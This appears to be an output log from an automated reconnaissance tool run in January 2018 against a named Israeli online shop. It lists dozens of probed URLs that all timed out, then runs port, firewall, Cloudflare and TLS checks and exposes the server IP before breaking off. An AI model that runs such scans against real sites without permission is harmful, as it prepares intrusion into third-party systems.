802. |_[ + ] [ 1 / 55 ]-[07:09:08] [ - ] 
803. |_[ + ] Target:: [ http://www.ishopy.co.il/מדריכים/ ]
804. |_[ + ] Exploit:: 
805. |_[ + ] Information Server:: , , IP::0 
806. |_[ + ] More details:: 
807. |_[ + ] Found:: UNIDENTIFIED
808. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
809. 
810.  _[ - ]::--------------------------------------------------------------------------------------------------------------
811. |_[ + ] [ 2 / 55 ]-[07:09:13] [ - ] 
812. |_[ + ] Target:: [ http://www.ishopy.co.il/חנויות/ ]
813. |_[ + ] Exploit:: 
814. |_[ + ] Information Server:: , , IP::0 
815. |_[ + ] More details:: 
816. |_[ + ] Found:: UNIDENTIFIED
817. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
818. 
819.  _[ - ]::--------------------------------------------------------------------------------------------------------------
820. |_[ + ] [ 3 / 55 ]-[07:09:18] [ - ] 
821. |_[ + ] Target:: [ http://www.ishopy.co.il/תקנון-אתר/ ]
822. |_[ + ] Exploit:: 
823. |_[ + ] Information Server:: , , IP::0 
824. |_[ + ] More details:: 
825. |_[ + ] Found:: UNIDENTIFIED
826. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
827. 
828.  _[ - ]::--------------------------------------------------------------------------------------------------------------
829. |_[ + ] [ 4 / 55 ]-[07:09:23] [ - ] 
830. |_[ + ] Target:: [ http://www.ishopy.co.il/מי-אנחנו/ ]
831. |_[ + ] Exploit:: 
832. |_[ + ] Information Server:: , , IP::0 
833. |_[ + ] More details:: 
834. |_[ + ] Found:: UNIDENTIFIED
835. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
836. 
837.  _[ - ]::--------------------------------------------------------------------------------------------------------------
838. |_[ + ] [ 5 / 55 ]-[07:09:28] [ - ] 
839. |_[ + ] Target:: [ http://www.ishopy.co.il/shop/stoneage/ ]
840. |_[ + ] Exploit:: 
841. |_[ + ] Information Server:: , , IP::0 
842. |_[ + ] More details:: 
843. |_[ + ] Found:: UNIDENTIFIED
844. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
845. 
846.  _[ - ]::--------------------------------------------------------------------------------------------------------------
847. |_[ + ] [ 6 / 55 ]-[07:09:33] [ - ] 
848. |_[ + ] Target:: [ http://www.ishopy.co.il/shop/שוקולנו/ ]
849. |_[ + ] Exploit:: 
850. |_[ + ] Information Server:: , , IP::0 
851. |_[ + ] More details:: 
852. |_[ + ] Found:: UNIDENTIFIED
853. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
854. 
855.  _[ - ]::--------------------------------------------------------------------------------------------------------------
856. |_[ + ] [ 7 / 55 ]-[07:09:38] [ - ] 
857. |_[ + ] Target:: [ http://www.ishopy.co.il/אנחנו-מאמינים/ ]
858. |_[ + ] Exploit:: 
859. |_[ + ] Information Server:: , , IP::0 
860. |_[ + ] More details:: 
861. |_[ + ] Found:: UNIDENTIFIED
862. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
863. 
864.  _[ - ]::--------------------------------------------------------------------------------------------------------------
865. |_[ + ] [ 8 / 55 ]-[07:09:43] [ - ] 
866. |_[ + ] Target:: [ http://www.ishopy.co.il/החשבון-שלי/ ]
867. |_[ + ] Exploit:: 
868. |_[ + ] Information Server:: , , IP::0 
869. |_[ + ] More details:: 
870. |_[ + ] Found:: UNIDENTIFIED
871. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
872. 
873.  _[ - ]::--------------------------------------------------------------------------------------------------------------
874. |_[ + ] [ 9 / 55 ]-[07:09:48] [ - ] 
875. |_[ + ] Target:: [ http://www.ishopy.co.il/עגלת-קניות/ ]
876. |_[ + ] Exploit:: 
877. |_[ + ] Information Server:: , , IP::0 
878. |_[ + ] More details:: 
879. |_[ + ] Found:: UNIDENTIFIED
880. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
881. 
882.  _[ - ]::--------------------------------------------------------------------------------------------------------------
883. |_[ + ] [ 10 / 55 ]-[07:09:53] [ - ] 
884. |_[ + ] Target:: [ http://www.ishopy.co.il/tag/יודיאיקה/ ]
885. |_[ + ] Exploit:: 
886. |_[ + ] Information Server:: , , IP::0 
887. |_[ + ] More details:: 
888. |_[ + ] Found:: UNIDENTIFIED
889. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
890. 
891.  _[ - ]::--------------------------------------------------------------------------------------------------------------
892. |_[ + ] [ 11 / 55 ]-[07:09:58] [ - ] 
893. |_[ + ] Target:: [ http://www.ishopy.co.il/tag/ייחודי/ ]
894. |_[ + ] Exploit:: 
895. |_[ + ] Information Server:: , , IP::0 
896. |_[ + ] More details:: 
897. |_[ + ] Found:: UNIDENTIFIED
898. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
899. 
900.  _[ - ]::--------------------------------------------------------------------------------------------------------------
901. |_[ + ] [ 12 / 55 ]-[07:10:03] [ - ] 
902. |_[ + ] Target:: [ http://www.ishopy.co.il/רשימה-לצפיה/ ]
903. |_[ + ] Exploit:: 
904. |_[ + ] Information Server:: , , IP::0 
905. |_[ + ] More details:: 
906. |_[ + ] Found:: UNIDENTIFIED
907. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
908. 
909.  _[ - ]::--------------------------------------------------------------------------------------------------------------
910. |_[ + ] [ 13 / 55 ]-[07:10:08] [ - ] 
911. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אומנות/הסיגריה/ ]
912. |_[ + ] Exploit:: 
913. |_[ + ] Information Server:: , , IP::0 
914. |_[ + ] More details:: 
915. |_[ + ] Found:: UNIDENTIFIED
916. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
917. 
918.  _[ - ]::--------------------------------------------------------------------------------------------------------------
919. |_[ + ] [ 14 / 55 ]-[07:10:13] [ - ] 
920. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אומנות/נוף/ ]
921. |_[ + ] Exploit:: 
922. |_[ + ] Information Server:: , , IP::0 
923. |_[ + ] More details:: 
924. |_[ + ] Found:: UNIDENTIFIED
925. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
926. 
927.  _[ - ]::--------------------------------------------------------------------------------------------------------------
928. |_[ + ] [ 15 / 55 ]-[07:10:18] [ - ] 
929. |_[ + ] Target:: [ http://www.ishopy.co.il/shop/חנות-מערכת/ ]
930. |_[ + ] Exploit:: 
931. |_[ + ] Information Server:: , , IP::0 
932. |_[ + ] More details:: 
933. |_[ + ] Found:: UNIDENTIFIED
934. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
935. 
936.  _[ - ]::--------------------------------------------------------------------------------------------------------------
937. |_[ + ] [ 16 / 55 ]-[07:10:23] [ - ] 
938. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אומנות/הספסל/ ]
939. |_[ + ] Exploit:: 
940. |_[ + ] Information Server:: , , IP::0 
941. |_[ + ] More details:: 
942. |_[ + ] Found:: UNIDENTIFIED
943. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
944. 
945.  _[ - ]::--------------------------------------------------------------------------------------------------------------
946. |_[ + ] [ 17 / 55 ]-[07:10:28] [ - ] 
947. |_[ + ] Target:: [ http://www.ishopy.co.il/shop/יערית-ארט/ ]
948. |_[ + ] Exploit:: 
949. |_[ + ] Information Server:: , , IP::0 
950. |_[ + ] More details:: 
951. |_[ + ] Found:: UNIDENTIFIED
952. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
953. 
954.  _[ - ]::--------------------------------------------------------------------------------------------------------------
955. |_[ + ] [ 18 / 55 ]-[07:10:33] [ - ] 
956. |_[ + ] Target:: [ http://www.ishopy.co.il/צרו-איתנו-קשר/ ]
957. |_[ + ] Exploit:: 
958. |_[ + ] Information Server:: , , IP::0 
959. |_[ + ] More details:: 
960. |_[ + ] Found:: UNIDENTIFIED
961. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
962. 
963.  _[ - ]::--------------------------------------------------------------------------------------------------------------
964. |_[ + ] [ 19 / 55 ]-[07:10:38] [ - ] 
965. |_[ + ] Target:: [ http://www.ishopy.co.il/wp-login.php ]
966. |_[ + ] Exploit:: 
967. |_[ + ] Information Server:: , , IP::0 
968. |_[ + ] More details:: 
969. |_[ + ] Found:: UNIDENTIFIED
970. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
971. 
972.  _[ - ]::--------------------------------------------------------------------------------------------------------------
973. |_[ + ] [ 20 / 55 ]-[07:10:43] [ - ] 
974. |_[ + ] Target:: [ http://www.ishopy.co.il/category/סרטוני-הדרכה/ ]
975. |_[ + ] Exploit:: 
976. |_[ + ] Information Server:: , , IP::0 
977. |_[ + ] More details:: 
978. |_[ + ] Found:: UNIDENTIFIED
979. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
980. 
981.  _[ - ]::--------------------------------------------------------------------------------------------------------------
982. |_[ + ] [ 21 / 55 ]-[07:10:48] [ - ] 
983. |_[ + ] Target:: [ http://www.ishopy.co.il/yaniv?action=register ]
984. |_[ + ] Exploit:: 
985. |_[ + ] Information Server:: , , IP::0 
986. |_[ + ] More details:: 
987. |_[ + ] Found:: UNIDENTIFIED
988. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
989. 
990.  _[ - ]::--------------------------------------------------------------------------------------------------------------
991. |_[ + ] [ 22 / 55 ]-[07:10:53] [ - ] 
992. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אומנות/אדנית-משטח/ ]
993. |_[ + ] Exploit:: 
994. |_[ + ] Information Server:: , , IP::0 
995. |_[ + ] More details:: 
996. |_[ + ] Found:: UNIDENTIFIED
997. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
998. 
999.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1000. |_[ + ] [ 23 / 55 ]-[07:10:58] [ - ] 
1001. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אומנות/צועד-ברחוב/ ]
1002. |_[ + ] Exploit:: 
1003. |_[ + ] Information Server:: , , IP::0 
1004. |_[ + ] More details:: 
1005. |_[ + ] Found:: UNIDENTIFIED
1006. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1007. 
1008.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1009. |_[ + ] [ 24 / 55 ]-[07:11:03] [ - ] 
1010. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אומנות/חתול-בטבע/ ]
1011. |_[ + ] Exploit:: 
1012. |_[ + ] Information Server:: , , IP::0 
1013. |_[ + ] More details:: 
1014. |_[ + ] Found:: UNIDENTIFIED
1015. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1016. 
1017.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1018. |_[ + ] [ 25 / 55 ]-[07:11:08] [ - ] 
1019. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אומנות/כוס-קפה/ ]
1020. |_[ + ] Exploit:: 
1021. |_[ + ] Information Server:: , , IP::0 
1022. |_[ + ] More details:: 
1023. |_[ + ] Found:: UNIDENTIFIED
1024. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1025. 
1026.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1027. |_[ + ] [ 26 / 55 ]-[07:11:13] [ - ] 
1028. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אומנות/כוס-לילדים/ ]
1029. |_[ + ] Exploit:: 
1030. |_[ + ] Information Server:: , , IP::0 
1031. |_[ + ] More details:: 
1032. |_[ + ] Found:: UNIDENTIFIED
1033. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1034. 
1035.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1036. |_[ + ] [ 27 / 55 ]-[07:11:18] [ - ] 
1037. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אומנות/מתחת-למטריה/ ]
1038. |_[ + ] Exploit:: 
1039. |_[ + ] Information Server:: , , IP::0 
1040. |_[ + ] More details:: 
1041. |_[ + ] Found:: UNIDENTIFIED
1042. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1043. 
1044.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1045. |_[ + ] [ 28 / 55 ]-[07:11:23] [ - ] 
1046. |_[ + ] Target:: [ http://www.ishopy.co.il/shop/שובשוב-יצירה-אקולוגית/ ]
1047. |_[ + ] Exploit:: 
1048. |_[ + ] Information Server:: , , IP::0 
1049. |_[ + ] More details:: 
1050. |_[ + ] Found:: UNIDENTIFIED
1051. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1052. 
1053.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1054. |_[ + ] [ 29 / 55 ]-[07:11:28] [ - ] 
1055. |_[ + ] Target:: [ http://www.ishopy.co.il/shop/איילת-השחר-עיצובים/ ]
1056. |_[ + ] Exploit:: 
1057. |_[ + ] Information Server:: , , IP::0 
1058. |_[ + ] More details:: 
1059. |_[ + ] Found:: UNIDENTIFIED
1060. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1061. 
1062.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1063. |_[ + ] [ 30 / 55 ]-[07:11:33] [ - ] 
1064. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אומנות/סט-כוסות-ייחודי/ ]
1065. |_[ + ] Exploit:: 
1066. |_[ + ] Information Server:: , , IP::0 
1067. |_[ + ] More details:: 
1068. |_[ + ] Found:: UNIDENTIFIED
1069. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1070. 
1071.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1072. |_[ + ] [ 31 / 55 ]-[07:11:38] [ - ] 
1073. |_[ + ] Target:: [ http://www.ishopy.co.il/shop/אדן-אדניות-וגינון-אורבני/ ]
1074. |_[ + ] Exploit:: 
1075. |_[ + ] Information Server:: , , IP::0 
1076. |_[ + ] More details:: 
1077. |_[ + ] Found:: UNIDENTIFIED
1078. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1079. 
1080.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1081. |_[ + ] [ 32 / 55 ]-[07:11:43] [ - ] 
1082. |_[ + ] Target:: [ http://www.ishopy.co.il/shop/פשיטא-גלריה-לאומנות-יהודית/ ]
1083. |_[ + ] Exploit:: 
1084. |_[ + ] Information Server:: , , IP::0 
1085. |_[ + ] More details:: 
1086. |_[ + ] Found:: UNIDENTIFIED
1087. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1088. 
1089.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1090. |_[ + ] [ 33 / 55 ]-[07:11:48] [ - ] 
1091. |_[ + ] Target:: [ http://www.ishopy.co.il/product-category/אומנות/page/2/ ]
1092. |_[ + ] Exploit:: 
1093. |_[ + ] Information Server:: , , IP::0 
1094. |_[ + ] More details:: 
1095. |_[ + ] Found:: UNIDENTIFIED
1096. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1097. 
1098.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1099. |_[ + ] [ 34 / 55 ]-[07:11:53] [ - ] 
1100. |_[ + ] Target:: [ http://www.ishopy.co.il/?w_action=user_feedback&post_author=1 ]
1101. |_[ + ] Exploit:: 
1102. |_[ + ] Information Server:: , , IP::0 
1103. |_[ + ] More details:: 
1104. |_[ + ] Found:: UNIDENTIFIED
1105. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1106. 
1107.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1108. |_[ + ] [ 35 / 55 ]-[07:11:58] [ - ] 
1109. |_[ + ] Target:: [ http://www.ishopy.co.il/?w_action=user_feedback&post_author=9 ]
1110. |_[ + ] Exploit:: 
1111. |_[ + ] Information Server:: , , IP::0 
1112. |_[ + ] More details:: 
1113. |_[ + ] Found:: UNIDENTIFIED
1114. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1115. 
1116.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1117. |_[ + ] [ 36 / 55 ]-[07:12:03] [ - ] 
1118. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אוכל/שוקולד-משפחתי-בעיצוב-אישי/ ]
1119. |_[ + ] Exploit:: 
1120. |_[ + ] Information Server:: , , IP::0 
1121. |_[ + ] More details:: 
1122. |_[ + ] Found:: UNIDENTIFIED
1123. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1124. 
1125.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1126. |_[ + ] [ 37 / 55 ]-[07:12:08] [ - ] 
1127. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אומנות/שרשרת-עור-בשילוב-אבני-סברובסקי/ ]
1128. |_[ + ] Exploit:: 
1129. |_[ + ] Information Server:: , , IP::0 
1130. |_[ + ] More details:: 
1131. |_[ + ] Found:: UNIDENTIFIED
1132. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1133. 
1134.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1135. |_[ + ] [ 38 / 55 ]-[07:12:13] [ - ] 
1136. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אומנות/ציורים-מקוריים-אקריליק-על-קנווס/ ]
1137. |_[ + ] Exploit:: 
1138. |_[ + ] Information Server:: , , IP::0 
1139. |_[ + ] More details:: 
1140. |_[ + ] Found:: UNIDENTIFIED
1141. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1142. 
1143.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1144. |_[ + ] [ 39 / 55 ]-[07:12:18] [ - ] 
1145. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אומנות/עגילים-עם-אפליקציה-מברונזה-עבודת-יד-בש/ ]
1146. |_[ + ] Exploit:: 
1147. |_[ + ] Information Server:: , , IP::0 
1148. |_[ + ] More details:: 
1149. |_[ + ] Found:: UNIDENTIFIED
1150. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1151. 
1152.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1153. |_[ + ] [ 40 / 55 ]-[07:12:23] [ - ] 
1154. |_[ + ] Target:: [ http://www.ishopy.co.il/shop/חנות-צילום-לתפוס-את-הרגע-חן-גן-אל-צלם/ ]
1155. |_[ + ] Exploit:: 
1156. |_[ + ] Information Server:: , , IP::0 
1157. |_[ + ] More details:: 
1158. |_[ + ] Found:: UNIDENTIFIED
1159. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1160. 
1161.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1162. |_[ + ] [ 41 / 55 ]-[07:12:28] [ - ] 
1163. |_[ + ] Target:: [ http://www.ishopy.co.il/products/uncategorized/שרשרת-ברונזה-עבודת-יד-בשילוב-אבן-אגט-עם/ ]
1164. |_[ + ] Exploit:: 
1165. |_[ + ] Information Server:: , , IP::0 
1166. |_[ + ] More details:: 
1167. |_[ + ] Found:: UNIDENTIFIED
1168. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1169. 
1170.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1171. |_[ + ] [ 42 / 55 ]-[07:12:33] [ - ] 
1172. |_[ + ] Target:: [ http://www.ishopy.co.il/products/אומנות/שרשרת-ייחודית-עבודת-יד-מאבני-מון-סטון-ו/ ]
1173. |_[ + ] Exploit:: 
1174. |_[ + ] Information Server:: , , IP::0 
1175. |_[ + ] More details:: 
1176. |_[ + ] Found:: UNIDENTIFIED
1177. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1178. 
1179.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1180. |_[ + ] [ 43 / 55 ]-[07:12:38] [ - ] 
1181. |_[ + ] Target:: [ http://www.ishopy.co.il/החשבון-שלי/תיבת-דואר/?priv_act=send&pid=149&uid=2 ]
1182. |_[ + ] Exploit:: 
1183. |_[ + ] Information Server:: , , IP::0 
1184. |_[ + ] More details:: 
1185. |_[ + ] Found:: UNIDENTIFIED
1186. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1187. 
1188.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1189. |_[ + ] [ 44 / 55 ]-[07:12:43] [ - ] 
1190. |_[ + ] Target:: [ http://www.ishopy.co.il/החשבון-שלי/תיבת-דואר/?priv_act=send&pid=154&uid=2 ]
1191. |_[ + ] Exploit:: 
1192. |_[ + ] Information Server:: , , IP::0 
1193. |_[ + ] More details:: 
1194. |_[ + ] Found:: UNIDENTIFIED
1195. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1196. 
1197.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1198. |_[ + ] [ 45 / 55 ]-[07:12:48] [ - ] 
1199. |_[ + ] Target:: [ http://www.ishopy.co.il/החשבון-שלי/תיבת-דואר/?priv_act=send&pid=268&uid=9 ]
1200. |_[ + ] Exploit:: 
1201. |_[ + ] Information Server:: , , IP::0 
1202. |_[ + ] More details:: 
1203. |_[ + ] Found:: UNIDENTIFIED
1204. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1205. 
1206.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1207. |_[ + ] [ 46 / 55 ]-[07:12:53] [ - ] 
1208. |_[ + ] Target:: [ http://www.ishopy.co.il/החשבון-שלי/תיבת-דואר/?priv_act=send&pid=257&uid=7 ]
1209. |_[ + ] Exploit:: 
1210. |_[ + ] Information Server:: , , IP::0 
1211. |_[ + ] More details:: 
1212. |_[ + ] Found:: UNIDENTIFIED
1213. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1214. 
1215.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1216. |_[ + ] [ 47 / 55 ]-[07:12:58] [ - ] 
1217. |_[ + ] Target:: [ http://www.ishopy.co.il/?switch_grd=grid&get_urls=http://www.ishopy.co.il/product-list/ ]
1218. |_[ + ] Exploit:: 
1219. |_[ + ] Information Server:: , , IP::0 
1220. |_[ + ] More details:: 
1221. |_[ + ] Found:: UNIDENTIFIED
1222. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1223. 
1224.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1225. |_[ + ] [ 48 / 55 ]-[07:13:03] [ - ] 
1226. |_[ + ] Target:: [ http://www.ishopy.co.il/?switch_grd=list&get_urls=http://www.ishopy.co.il/tag/%D7%A2%D7%95%D7%A8/ ]
1227. |_[ + ] Exploit:: 
1228. |_[ + ] Information Server:: , , IP::0 
1229. |_[ + ] More details:: 
1230. |_[ + ] Found:: UNIDENTIFIED
1231. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1232. 
1233.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1234. |_[ + ] [ 49 / 55 ]-[07:13:08] [ - ] 
1235. |_[ + ] Target:: [ http://www.ishopy.co.il/?switch_grd=grid&get_urls=http://www.ishopy.co.il/tag/%D7%A9%D7%A8%D7%A9%D7%A8%D7%AA/ ]
1236. |_[ + ] Exploit:: 
1237. |_[ + ] Information Server:: , , IP::0 
1238. |_[ + ] More details:: 
1239. |_[ + ] Found:: UNIDENTIFIED
1240. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1241. 
1242.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1243. |_[ + ] [ 50 / 55 ]-[07:13:13] [ - ] 
1244. |_[ + ] Target:: [ http://www.ishopy.co.il/?switch_grd=grid&get_urls=http://www.ishopy.co.il/tag/%D7%90%D7%91%D7%A0%D7%99%D7%9D/ ]
1245. |_[ + ] Exploit:: 
1246. |_[ + ] Information Server:: , , IP::0 
1247. |_[ + ] More details:: 
1248. |_[ + ] Found:: UNIDENTIFIED
1249. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1250. 
1251.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1252. |_[ + ] [ 51 / 55 ]-[07:13:18] [ - ] 
1253. |_[ + ] Target:: [ http://www.ishopy.co.il/?switch_grd=grid&get_urls=http://www.ishopy.co.il/tag/%D7%90%D7%95%D7%9E%D7%A0%D7%95%D7%AA/ ]
1254. |_[ + ] Exploit:: 
1255. |_[ + ] Information Server:: , , IP::0 
1256. |_[ + ] More details:: 
1257. |_[ + ] Found:: UNIDENTIFIED
1258. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1259. 
1260.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1261. |_[ + ] [ 52 / 55 ]-[07:13:23] [ - ] 
1262. |_[ + ] Target:: [ http://www.ishopy.co.il/?switch_grd=list&get_urls=http://www.ishopy.co.il/tag/%D7%92%D7%A9%D7%9D-%D7%A6%D7%99%D7%9C%D7%95%D7%9D-%D7%A6%D7%9C%D7%9D-%D7%A8%D7%97%D7%95%D7%91-%D7%96%D7%95%D7%92-%D7%A8%D7%95%D7%9E%D7%A0%D7%98%D7%99/ ]
1263. |_[ + ] Exploit:: 
1264. |_[ + ] Information Server:: , , IP::0 
1265. |_[ + ] More details:: 
1266. |_[ + ] Found:: UNIDENTIFIED
1267. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1268. 
1269.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1270. |_[ + ] [ 53 / 55 ]-[07:13:28] [ - ] 
1271. |_[ + ] Target:: [ http://www.ishopy.co.il/?switch_grd=grid&get_urls=http://www.ishopy.co.il/tag/%D7%A6%D7%99%D7%9C%D7%95%D7%9D-%D7%A8%D7%97%D7%95%D7%91-%D7%A6%D7%9C%D7%9D-%D7%AA%D7%9E%D7%95%D7%A0%D7%94-%D7%90%D7%95%D7%9E%D7%A0%D7%95%D7%AA/ ]
1272. |_[ + ] Exploit:: 
1273. |_[ + ] Information Server:: , , IP::0 
1274. |_[ + ] More details:: 
1275. |_[ + ] Found:: UNIDENTIFIED
1276. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1277. 
1278.  _[ - ]::--------------------------------------------------------------------------------------------------------------
1279. |_[ + ] [ 54 / 55 ]-[07:13:33] [ - ] 
1280. |_[ + ] Target:: [ http://www.ishopy.co.il/?switch_grd=list&get_urls=http://www.ishopy.co.il/tag/%D7%A6%D7%99%D7%9C%D7%95%D7%9D-%D7%98%D7%91%D7%A2-%D7%97%D7%99%D7%95%D7%AA-%D7%A6%D7%9C%D7%9D-%D7%AA%D7%9E%D7%95%D7%A0%D7%94-%D7%90%D7%95%D7%9E%D7%A0%D7%95%D7%AA/ ]
1281. |_[ + ] Exploit:: 
1282. |_[ + ] Information Server:: , , IP::0 
1283. |_[ + ] More details:: 
1284. |_[ + ] Found:: UNIDENTIFIED
1285. |_[ + ] ERROR CONECTION:: Connection timed out after 5000 milliseconds
1286.  
1287. [ INFO ] [ Shutting down ]
1288. [ INFO ] [ End of process INURLBR at [05-01-2018 07:13:33]
1289. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
1290. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-ishopy.co.il.txt ]
1291. |_________________________________________________________________________________________
1292.  
1293. \_________________________________________________________________________________________/
1294.  
1295.  + -- --=[Port 110 opened... running tests...
1296.  
1297. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-05 07:13 EST
1298. Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
1299. Nmap done: 1 IP address (0 hosts up) scanned in 1.96 seconds
1300.  + -- --=[Port 111 closed... skipping.
1301.  + -- --=[Port 135 closed... skipping.
1302.  + -- --=[Port 139 closed... skipping.
1303.  + -- --=[Port 161 closed... skipping.
1304.  + -- --=[Port 162 closed... skipping.
1305.  + -- --=[Port 389 closed... skipping.
1306.  + -- --=[Port 443 opened... running tests...
1307.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
1308.  
1309. ^ ^
1310. _ __ _ ____ _ __ _ _ ____
1311. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1312. | V V // o // _/ | V V // 0 // 0 // _/
1313. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1314. <
1315. ...'
1316.  
1317. WAFW00F - Web Application Firewall Detection Tool
1318.  
1319. By Sandro Gauci && Wendel G. Henrique
1320.  
1321. Checking https://ishopy.co.il
1322.  
1323.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
1324. ____ _ _ _____ _ _
1325. / ___| | ___ _ _ __| | ___|_ _(_) |
1326. | | | |/ _ \| | | |/ _` | |_ / _` | | |
1327. | |___| | (_) | |_| | (_| | _| (_| | | |
1328. \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
1329. v1.0.1 by m0rtem
1330.  
1331.  
1332. [07:13:42] Initializing CloudFail - the date is: 05/01/2018
1333. [07:13:42] Fetching initial information from: ishopy.co.il...
1334. [07:13:42] No ipout file found, fetching data
1335. [07:13:42] Just checking for updates, please wait...
1336. [07:13:42] Updating CloudFlare subnet...
1337. [07:13:42] Updating Crimeflare database...
1338. [07:15:29] ipout file created
1339. [07:15:29] Server IP: 81.218.229.174
1340. [07:15:29] Testing if ishopy.co.il is on the Cloudflare network...
1341. [07:15:29] ishopy.co.il is not part of the Cloudflare network, quitting...
1342.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
1343. https://ishopy.co.il [ Unassigned]
1344.  
1345.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
1346.  
1347.  
1348.  
1349. AVAILABLE PLUGINS
1350. -----------------
1351.  
1352. PluginHSTS
